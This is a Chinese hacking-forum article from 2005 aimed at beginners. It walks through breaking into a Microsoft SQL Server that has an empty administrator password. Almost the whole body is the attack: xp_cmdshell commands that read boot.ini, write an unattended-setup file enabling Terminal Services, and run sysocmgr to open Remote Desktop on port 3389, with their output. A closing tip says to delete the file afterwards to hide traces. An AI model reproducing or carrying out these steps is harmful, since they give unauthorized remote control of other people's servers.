黑客在线-SQL开3389入侵实例记录（献给新手）

	黑客工具 \| 黑客动画 \| 网络无限 \| 游戏工具 \| 安全相关 \| 多媒体类 \| 网页设计 \| VIP会员专区
	在线首页 \| 技术文章 \| 最近更新 \| 推荐软件 \| 灰鸽子专题 \| 明星写真 \| QQ空间教程 \| QQ专卖店

当前位置：黑客在线 >> 文章首页→黑客教程 →入侵教程→SQL开3389入侵实例记录（献给新手）

SQL开3389入侵实例记录（献给新手）

作者：不详　来源于：◇黑客在线◇ 　发布时间：2005-6-19 20:13:36

加入时间：2004-9-19 阅读次数: 690 查看: [大字中等还原] 自动滚屏[左键停止]

SQL开3389入侵实例记录（献给新手）

作者：未知

把一次从SQL开3389的记录过程发出来，望对新手有用

注：//为注释
实例过程：
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:xp_cmdshell "type c:\boot.ini" // 输入命令，看系统，server版的才能开3389
执行成功,结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盘根目录建写入一个文件，文件名duguxike大家可以自己改为自己的
执行成功,结果:

命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加写入
执行成功,结果:

命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确
执行成功,结果:
[Components]
TsEnable = on
TsEnable = on

命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389，成功的话过会肉机会重启！！
执行成功,结果:
GetLocalManagedApplications returned (2)

之后就看大家的了，不过要记得册除新建的duguxike文件哦！！！

[] [返回上一页] [告诉好友] [发表评论] [打印] [ 字体：大中小 ]

上篇文章：如何解决dllhost进程消耗CPU100%的问题　
下篇文章：风色再次和上海像素提供百兆空间支持ASP+PHP+mysql

∷相关文章∷

∷相关软件∷

· SQL开放扫描器